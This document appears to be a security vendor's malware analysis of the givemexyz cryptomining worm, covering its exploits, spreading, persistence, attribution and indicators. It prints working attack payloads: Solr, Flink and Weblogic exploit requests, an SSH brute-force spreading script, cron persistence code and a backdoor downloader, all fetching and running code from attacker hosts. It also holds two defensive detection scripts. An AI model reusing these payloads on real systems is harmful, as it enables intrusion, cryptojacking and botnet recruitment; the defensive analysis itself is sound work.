1. Overview
Alibaba Cloud Security Center has observed that the givemexyz mining family remains active on the cloud. The family spreads through weak server passwords, web vulnerabilities, middleware vulnerabilities and similar weaknesses, uses bash, Python, PowerShell and other malicious scripts to attack in bulk, and is able to spread across platforms. Given how widely it has spread, the scope of its impact, and its worsening trend, its methods warrant a detailed analysis.
2. Detailed analysis
0x1: Exploit
First, we analyze the weaponized vulnerabilities used by the givemexyz family. By vulnerability type, the family mainly uses web RCE, unauthorized access to middleware, and brute-force cracking.
Apache Solr RCE vulnerability (CVE-2019-0193)
```xml
<dataSource type="URLDataSource"/>
<script><![CDATA[
  function poc(){
    java.lang.Runtime.getRuntime().exec("powershell iex(New-Object Net.WebClient).DownloadString('http://209.141.40.190/xms.ps1')");
  }
]]></script>
<document>
  <entity name="stackoverflow"
          url="https://stackoverflow.com/feeds/tag/solr"
          processor="XPathEntityProcessor"
          forEach="/feed"
          transformer="script:poc" />
</document>
```
Apache Flink arbitrary file upload (CVE-2020-17518)
```text
/jars/d847111f-cd11-4b14-b05a-9e38c3a2084a_check-execute.jar/run?entry-class=Execute&program-args="nohup echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9lZS5weSIpLnJlYWQoKSkn | base64 -d | bash -"
```
Weblogic Console HTTP protocol RCE (CVE-2020-14882)
```text
/console/css/%2e%2e%2fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('
  weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread();
  weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();
  java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
  field.setAccessible(true);
  Object obj = field.get(adapter);
  weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);
  String cmd = req.getHeader("cmd");
  String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")
      ? new String[]{"cmd.exe ", "/c", "powershell iex(New-Object Net.WebClient).DownloadString('http://209.141.40.190/xms.ps1')"}
      : new String[]{"/bin/sh", "-c", "curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"};
  if(cmd != null){
    String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
  }
  currentThread.interrupt();
')
```
Brute force cracking
In addition to the relatively new vulnerabilities above, the givemexyz family also exploits the Weblogic WLS component vulnerability (CVE-2017-10271), Hadoop unauthorized access, Docker remote API unauthorized access, Weblogic deserialization remote code execution (CVE-2019-2725) and others, and keeps adopting newly disclosed vulnerabilities for attack scanning.
Furthermore, the “http://209.141.40.190/scan.sh” malicious script used by the attackers shows that this family has always carried a built-in brute-force scanning module and continuously scans outward.
```bash
#!/bin/bash
ip a | grep 'BROADCAST\|inet' | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 | grep -v 255 | head -n1 > /var/tmp/ranges.txt
cat /var/tmp/ranges.txt | while read line; do
    nohup /var/tmp/scan $line.0.0-$line.255.255 22 > /var/tmp/ssh_vuln.txt
    cat /var/tmp/ssh_vuln.txt | grep 'OpenSSH' | awk '{print $1}' | uniq | shuf > /var/tmp/sshcheck
    nohup /var/tmp/hxx 300 -f /var/tmp/sshcheck /var/tmp/ps 22 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /var/tmp/xms; bash /var/tmp/xms; rm -rf /var/tmp/xms' >/dev/null 2>&1
done
```
| Path | MD5 | Function |
|---|---|---|
| /var/tmp/scan | b42183f226ab540fb07dd46088b382cf | Intranet SSH port scan |
| /var/tmp/hxx | f0551696774f66ad3485445d9e3f7214 | SSH brute-force cracking, remote execution of programs |
0x2: Malicious code analysis
The attacker exploits the vulnerability to remotely execute malicious script code on the victim’s machine.
On a Linux machine, the following command is executed:
```bash
/bin/sh -c nohup echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9lZS5weSIpLnJlYWQoKSkn | base64 -d | bash -
```
The base64 decodes to:
```bash
python -c 'import urllib;exec(urllib.urlopen("http://209.141.40.190/ee.py").read())'
```
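Defenders can recover the fetch target from a captured command line or web request without executing anything. The following is an added example, not code from the report: it decodes every long base64 run in a line and matches the result against the loader shape shown above, which the Flink and Weblogic payloads in 0x1 also carry. The sample lines are constructed from the report's payloads (the jar id is a placeholder); the host list is the report's.

```python
import base64
import binascii
import re

# Indicators from the report: the delivery hosts, and the shape of the one-liner that the
# base64 in every delivery command decodes to:
#   python -c 'import urllib;exec(urllib.urlopen("http://<host>/<file>").read())'
KNOWN_HOSTS = ("209.141.40.190", "194.5.249.238", "39.96.117.48", "bash.givemexyz.in")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
LOADER = re.compile(r"python\s+-c\s+'import urllib;exec\(urllib\.urlopen\(\"(https?://[^\"]+)\"")


def decode_runs(line):
    """Yield the decoded text of every long base64 run in a line; skip runs that are not base64."""
    for run in B64_RUN.findall(line):
        try:
            yield base64.b64decode(run + "=" * (-len(run) % 4)).decode("utf-8", "replace")
        except binascii.Error:
            continue


def classify(line):
    """Return the reasons a captured request or command line matches givemexyz delivery."""
    reasons = [f"known delivery host {host}" for host in KNOWN_HOSTS if host in line]
    for text in decode_runs(line):
        match = LOADER.search(text)
        if match:
            reasons.append(f"base64-wrapped python loader fetching {match.group(1)}")
    return reasons


# The two base64 strings quoted in the report (ee.py and d.py loaders).
B64_EE = "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9lZS5weSIpLnJlYWQoKSkn"
B64_D = "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc="

# Constructed sample lines modelled on the report's payloads, plus one benign line that
# merely carries a long base64 value.
SAMPLE_LINES = {
    "linux_cmd": f"/bin/sh -c nohup echo {B64_EE} | base64 -d | bash -",
    "flink_req": f'POST /jars/<jar-id>_check-execute.jar/run?entry-class=Execute&program-args="nohup echo {B64_EE} | base64 -d | bash -"',
    "weblogic_cmd": f"/bin/sh -c curl -s http://209.141.40.190/xms | bash -sh; echo {B64_D} | base64 -d | bash -",
    "benign": "echo VGhlIHF1aWNrIGJyb3duIGZveCBqdW1wcyBvdmVyIHRoZSBsYXp5IGRvZw== | base64 -d",
}


def triage(lines=SAMPLE_LINES):
    """Classify every sample line; the result maps each label to its list of reasons."""
    return {label: classify(line) for label, line in lines.items()}


if __name__ == "__main__":
    for label, reasons in triage().items():
        print(label, "->", reasons or ["clean"])
```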
The attack process of the givemexyz family Linux version is as follows:
Malicious file functions involved in the attack process:
| File name | File type | File function |
|---|---|---|
| ee.py | Python script | Payload delivery |
| hxx | Binary program | SSH brute-force cracking, remote execution of programs |
| ps | Text | Weak-password dictionary |
| scan | Binary program | Intranet SSH port scan |
| scan.sh | Bash script | Port scanning, brute-force attack, lateral movement |
| xms | Bash script | Payload delivery, lateral movement through SSH certificates, persistence implantation, killing competing miners and security software, downloading and running mining software |
| d.py / dd.py | Python script | Payload delivery, persistence implantation |
| go | Binary program | Runs the mining program |
| dbusex | Binary program | Mining program |
| b.py | Python script | Payload delivery |
| x64b / x32b | Binary program | DDoS attack, SYN flood, UDP flood, central control |
On a Windows machine, the following command is executed:
```powershell
powershell iex(New-Object Net.WebClient).DownloadString('http://209.141.40.190/xms.ps1')
```
The attack process of the Windows version of the givemexyz family is as follows:
Malicious file functions involved in the attack process:
| File name | File type | File function |
|---|---|---|
| xms.ps1 | PowerShell script | Payload delivery |
| xmr32.exe / xmr64.exe | Binary program | Mining program |
| mywindows.exe | Binary program | Mining program |
| r.vbs | VBS script | Payload delivery, persistence implantation |
| nazi.exe | Binary program | Mining program, persistence implantation |
| cudas.exe | Binary program | Mining program |
0x3: Persistence control
To help customers remove this worm family's persistence, we focus on the persistence methods used by the givemexyz family.
The Linux version of the givemexyz family uses malicious scripts to implant scheduled tasks, startup items and backdoor programs for persistent control.
```bash
#!/bin/bash
if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ]; then
    url="bash.givemexyz.in"
    base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei5pbi9kZC5weSIpLnJlYWQoKSkn"
else
    url="194.5.249.238"
    base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuNS4yNDkuMjM4L2QucHkiKS5yZWFkKCkpJw=="
fi
if cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down | grep -q "205.185.116.78\|5.196.247.12\|bash.givemexyz.xyz\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc=\|209.141.40.190"
then
    chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
    crontab -r
    echo "Cron not found"
    echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /etc/cron.d/root
    echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /etc/cron.d/apache
    echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex -c $dns && /var/run/dbusex -c $dns && /root/dbusex -c $dns\\ ##" > /etc/cron.d/nginx
    echo -e "*/30 * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\\ ; rm -rf /tmp/xms\\ ##" > /var/spool/cron/root
    echo IyEvYmluL2Jhc2gKCmlmIFsgJChwaW5nIC1jIDEgYmFzaC5naXZlbWV4eXouaW4gMj4vZGV2L251bGx8Z3JlcCAiYnl0ZXMgb2YgZGF0YSIgfCB3YyAtbCApIC1ndCAnMCcgXTsKdGhlbgogICAgICAg IHVybD0iYmFzaC5naXZlbWV4eXouaW4iCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTlpWVh Ob0xtZHBkbVZ0WlhoNWVpNXBiaTlrWkM1d2VTSXBMbkpsWVdRb0tTa24iCmVsc2UKICAgICAgICB1cmw9IjE5Nc41LjI0OS4yMzgiCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjbl FnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh4T1RRdU5TNHlORGt1TWpNNEwyUXVjSGtpS1M1eVpXRmtLQ2twSnc9PSIKZmkKCmVjaG8gLWUgJyMhL2Jpbi9i YXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdW x0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vJHVybC94bXN8fHdnZXQgLXEgLU8tIGh0dHA6Ly 8kdXJsL3htcyl8YmFzaCAtc2g7IGVjaG8gJGJhc2UgfCBiYXNlNjQgLWQgfCBiYXNoIC07IGx3cC1kb3dubG9hZCBodHRwOi8vJHVybC94bXMgL3RtcC94bXM7IGJhc2ggL3RtcC94bXM7 IHJtIC1yZiAvdG1wL3htcycgPiAvZXRjL2luaXQuZC9kb3du | base64 -d | bash -
    mkdir -p /var/spool/cron/crontabs
    echo -e "* * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
fi
```
Machines compromised by this worm can be self-diagnosed and cleaned based on the location where persistence is implanted.
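One way to perform that self-diagnosis on a Linux host, as an added example rather than the report's own tooling: it reads each persistence location the xms script writes, looks for the indicators that script itself greps for, and lists which of the drop paths named in the report are present. The sample tree is constructed for demonstration; pass "/" to triage a live host.

```python
import os
import tempfile

# Files the Linux xms script in the report writes its cron / init.d entries to (relative to /).
PERSISTENCE_FILES = (
    "etc/cron.d/root", "etc/cron.d/apache", "etc/cron.d/nginx",
    "var/spool/cron/root", "var/spool/cron/crontabs/root",
    "etc/cron.hourly/oanacroner1", "etc/init.d/down",
)
# Locations the report shows the worm staging or running its payloads from.
DROPPED_FILES = (
    "dev/shm/dbusex", "var/run/dbusex", "root/dbusex", "tmp/xms", "var/tmp/xms",
    "tmp/x64b", "tmp/x32b", "var/tmp/scan", "var/tmp/hxx", "var/tmp/ps", "var/tmp/sshcheck",
)
# Strings found in the report's cron entries and in the script's own grep; the base64
# prefix is the start of "python -c 'import urllib;exec(urllib.urlopen(" in every loader variant.
INDICATORS = (
    "209.141.40.190", "194.5.249.238", "39.96.117.48", "205.185.116.78", "5.196.247.12",
    "givemexyz", "lwp-download", "cHl0aG9uIC1jICdpbXBvcnQgdXJsbGli",
)


def check_persistence(root="/"):
    """Return {"tainted": [(path, [indicators])], "dropped": [path]} for the tree under root."""
    tainted, dropped = [], []
    for rel in PERSISTENCE_FILES:
        path = os.path.join(root, rel)
        try:
            with open(path, "r", errors="replace") as fh:
                content = fh.read()
        except OSError:  # absent or unreadable: nothing to report for this location
            continue
        hits = [ioc for ioc in INDICATORS if ioc in content]
        if hits:
            tainted.append((path, hits))
    for rel in DROPPED_FILES:
        path = os.path.join(root, rel)
        if os.path.lexists(path):
            dropped.append(path)
    return {"tainted": tainted, "dropped": dropped}


def build_sample_tree():
    """Constructed mini filesystem: one report-style cron entry plus one dropped file."""
    root = tempfile.mkdtemp(prefix="givemexyz-sample-")
    os.makedirs(os.path.join(root, "etc/cron.d"))
    os.makedirs(os.path.join(root, "tmp"))
    with open(os.path.join(root, "etc/cron.d/root"), "w") as fh:
        fh.write("*/1 * * * * root (curl -s http://209.141.40.190/xms||wget -q -O - http://209.141.40.190/xms)"
                 "|bash -sh; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n")
    open(os.path.join(root, "tmp/xms"), "w").close()
    return root


if __name__ == "__main__":
    report = check_persistence(build_sample_tree())  # use check_persistence("/") on a live host
    for path, hits in report["tainted"]:
        print("tainted:", path, "->", ", ".join(hits))
    for path in report["dropped"]:
        print("dropped file present:", path)
```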
At the same time, the worm also uses Python to download malicious backdoor programs.
```python
import urllib
import platform
import os

if platform.architecture()[0] == "64bit":
    urlx64 = "http://39.96.117.48/x64b"
    try:
        f = urllib.urlopen(urlx64)
        if f.code == 200:
            data = f.read()
            with open("/tmp/x64b", "wb") as code:
                code.write(data)
            os.chmod("/tmp/x64b", 0o777)
            os.system("/tmp/x64b")
    except:
        pass
else:
    urlx32 = "http://39.96.117.48/x32b"
    try:
        y = urllib.urlopen(urlx32)
        if y.code == 200:
            data = y.read()
            with open("/tmp/x32b", "wb") as code:
                code.write(data)
            os.chmod("/tmp/x32b", 0o777)
            os.system("/tmp/x32b")
    except:
        pass
```
| File name | MD5 | Binary function |
|---|---|---|
| /tmp/x64b, /tmp/x32b | c4d44eed4916675dd408ff0b3562fb1f | DDoS attack, SYN flood, UDP flood, central control |
The persistence methods of the Windows version are:
1. Persistence by dropping a shortcut into the auto-start folder:
The startup shortcut is dropped by the startup VBS script, which is as follows:
```vbscript
Set objFSO = CreateObject("Scripting.FileSystemObject")
outFile = "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pFWPPQezaQ.url"
Set objFile = objFSO.CreateTextFile(outFile, True)
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\ALmRPARcYN\mywindows.exe"""
objFile.Close
```
2. Persistence by writing a startup item to the registry:
The sample adds its own program path to the registry Run list and disguises the entry name as a normal Oracle process.
Registry path: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oracleservice.exe
At the same time, to evade detection, the sample starts a legitimate system process as a puppet process and executes its malicious code inside it.
If the CPU usage of an otherwise normal system process suddenly soars, it is worth checking whether the sample is using that process as a shell for mining.
3. Family attribution
Through analysis of the malicious files and correlation of the command-and-control (C2) domain names and IPs, this incident can be associated with StartMiner (the 8220 mining family). In addition, on 2021-01-28 at 03:28:41, mining for Windows systems was added on top of the original toolset. Since the C2 domain names used all contain the word givemexyz, we named the family givemexyz.
We calculated the activity coefficient of the givemexyz family from factors such as the change cycle of IoCs (domain names and IPs) and the affected range. The family became active in the second half of 2019 and has shown a tendency to explode since the second half of 2020. The worm does not target specific industries; it exploits vulnerabilities indiscriminately to move laterally.
4. Emergency response
Alibaba Cloud Security Center provides customers with comprehensive enterprise-level emergency response capabilities.
Threat detection
250+ threat detection models provide customers with full-link threat detection. We immediately captured and detected the variant malicious scripts, malicious programs and persistence mechanisms used by the worm.
Detect web vulnerabilities and middleware vulnerabilities used by the worm family:
Bash, python, powershell and other batch attack scripts used by worms are detected:
Detection of mining programs and backdoor programs used by worms:
Defensive blocking
The Cloud Security Center not only detects intrusion events comprehensively but also provides proactive defense and interception: malicious network connections, brute-force attacks, malicious DNS requests and malicious commands are blocked at the host level.
One-click cleanup
For the persistence techniques used by this worm family, the Cloud Security Center provides closed-loop handling that can be applied with one click.
5. IoCs
The active IOCs of the givemexyz family this time are as follows:
6. Security recommendations
1. We have opened some detection capabilities (malicious file detection) to free users of Alibaba Cloud. Free users can log in to the Cloud Security Center console to view alert information and use it to identify the source of the intrusion and fix the vulnerabilities.
2. Users of the enterprise edition can turn on defense capabilities such as anti-virus and malicious network behavior blocking to stop attacks in advance, and can run a scan and cleanup through the virus defense function.